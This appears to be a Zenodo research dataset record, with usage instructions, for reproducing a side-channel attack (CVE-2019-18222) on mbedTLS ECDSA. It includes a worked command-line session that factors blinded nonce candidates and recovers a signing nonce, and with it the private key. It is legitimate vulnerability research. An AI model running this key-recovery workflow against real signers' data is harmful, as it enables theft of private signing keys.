10.5281/zenodo.3605805
https://zenodo.org/records/3605805
oai:zenodo.org:3605805
Alejandro Cabrera Aldaya
Alejandro Cabrera Aldaya
0000-0002-1544-6772
Tampere University
Billy Bob Brumley
Billy Bob Brumley
0000-0001-9160-0463
Tampere University
CVE-2019-18222: research data and tooling
Zenodo
2020
side-channel analysis
ECDSA
binary GCD
modular inversion
Intel SGX
mbedTLS
2020-01-13
eng
https://eprint.iacr.org/2020/055
10.5281/zenodo.3605804
MIT License
This dataset and software tool are for reproducing the research results related to CVE-2019-18222.
Description
enum contains the key enumeration tool.
kt_candidates contains the JSON for blinded nonce candidates, indexed by trial number. JSON fields:
kt_candidates: list of nonce candidates.
sig_data contains the JSON for ECDSA signatures, index by trial number. JSON fields:
p: the prime the curve is defined over. (P-256 here.)
Gx, Gy: Generator coordinates.
d: Ground truth ECDSA long term key.
Px, Py: Public key coordinates.
h: SHA-256 digest to sign, encoded to the finite field.
k: Ground truth ECDSA nonce.
r, s: ECDSA signature.
Build
cd enum
make clean
make
Run
Start with enum as the working directory.
cd enum
Pull out a kt candidate, in this example index 847.
$ jq '.kt_candidates' ../kt_candidates/kt_candidates_847.json
[
"0x48ad7217d10f6c7b1a3db836d38aa3972999115f38a6b3d176fc660941aa5c882d2528ec1fc27da7610e7ee3d7dd84367c380259e0386224c2c46aa2a5eb2a0"
]
Factor that candidate.
$ time sage -c "print ecm.factor(0x48ad7217d10f6c7b1a3db836d38aa3972999115f38a6b3d176fc660941aa5c882d2528ec1fc27da7610e7ee3d7dd84367c380259e0386224c2c46aa2a5eb2a0)"
[2, 2, 2, 2, 2, 3, 353, 193243, 1540830719, 9263081209, 103633959617085683, 151389566295160172521, 283135469779419532841, 572987990320782777757565685333349772719941819448953457732874126833]
real 0m5.837s
user 0m5.648s
sys 0m0.214s
Now pull out the r component of the ECDSA signature for that index, and convert it from hex to base 10.
$ jq '.r' ../sig_data/sig_data_847.json
"0x30e2ce20a8140177a31a66763d85f431acc9790dd050ffc22ed5d454cdfbbb67"
$ python -c "print 0x30e2ce20a8140177a31a66763d85f431acc9790dd050ffc22ed5d454cdfbbb67"
22111746808803128586382711090186612204136854333384650261207856620766542674791
Now run the enum tool to recover the nonce.
$ ./enum
Usage: ./enum <jobs_num> <jobs_id> <target_base_10> space delimited flat list of factors in base ten
The <jobs_num> and <jobs_id> arguments are to ease parallel execution; read the source code. But for a single core, pass them as 1 0.
$ ./enum 1 0 22111746808803128586382711090186612204136854333384650261207856620766542674791 2 2 2 2 2 3 353 193243 1540830719 9263081209 103633959617085683 151389566295160172521 2831354697794195
32841 572987990320782777757565685333349772719941819448953457732874126833
INFO:target:30E2CE20A8140177A31A66763D85F431ACC9790DD050FFC22ED5D454CDFBBB67
INFO:found:31A52C4960857E6D2F7AD82BAC7D55CE6CC9AD13B959F069002B6A949EA6A048
INFO:tests:7879
where 221..791 is the base-10 r component of the ECDSA signature, and 2 2 .. 572..833 is the full list of blinded nonce factors. In the output:
INFO:target:<hex> is the hex form of base-10 target input (ECDSA r component).
INFO:found:<hex> is the hex form of the recovered ECDSA nonce.
INFO:tests:<num> is the number of tested nonce candidates (scalar multiplications).
We can see this successfully recovered the nonce (hence long term ECDSA private key) correctly:
$ jq '.k' ../sig_data/sig_data_847.json
"0x31a52c4960857e6d2f7ad82bac7d55ce6cc9ad13b959f069002b6a949ea6a048"
European Commission
10.13039/501100000780
804476
Side-Channel Aware Engineering